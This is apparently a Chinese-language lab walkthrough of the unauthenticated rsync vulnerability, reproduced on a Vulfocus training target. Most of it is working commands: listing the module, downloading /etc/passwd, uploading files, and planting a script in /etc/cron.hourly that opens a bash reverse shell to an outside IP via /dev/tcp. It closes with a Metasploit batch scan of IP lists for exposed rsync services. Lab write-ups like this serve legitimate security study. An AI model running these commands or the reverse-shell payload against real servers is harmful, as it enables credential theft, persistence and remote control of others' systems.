漏洞描述
产生原因
环境搭建
漏洞复现
漏洞发现
漏洞描述
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口
产生原因
开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
环境搭建
使用Vulfocus 漏洞威胁分析平台在线靶场测试:
漏洞复现
判断:rsync rsync://123.58.224.8:12018/
利用:
-读取文件:rsync rsync://123.58.224.8:12018/src/
-下载文件:rsync rsync://123.58.224.8:12018/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://123.58.224.8:12018/src/tmp/passwd
利用定时任务反弹shell
-
获取信息
rsync rsync://123.58.224.8:12018/src/etc/crontab /root/cron.txt
-
.创建文件
touch shell #!/bin/bash /bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1 chmod +x shell
-
上传文件
rsync -av shell rsync://123.58.224.8:12018/src/etc/cron.hourly //创建一个同名文件来代替
- 等待接受反弹
漏洞发现
利用msf框架将想要测试的ip批量测试
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run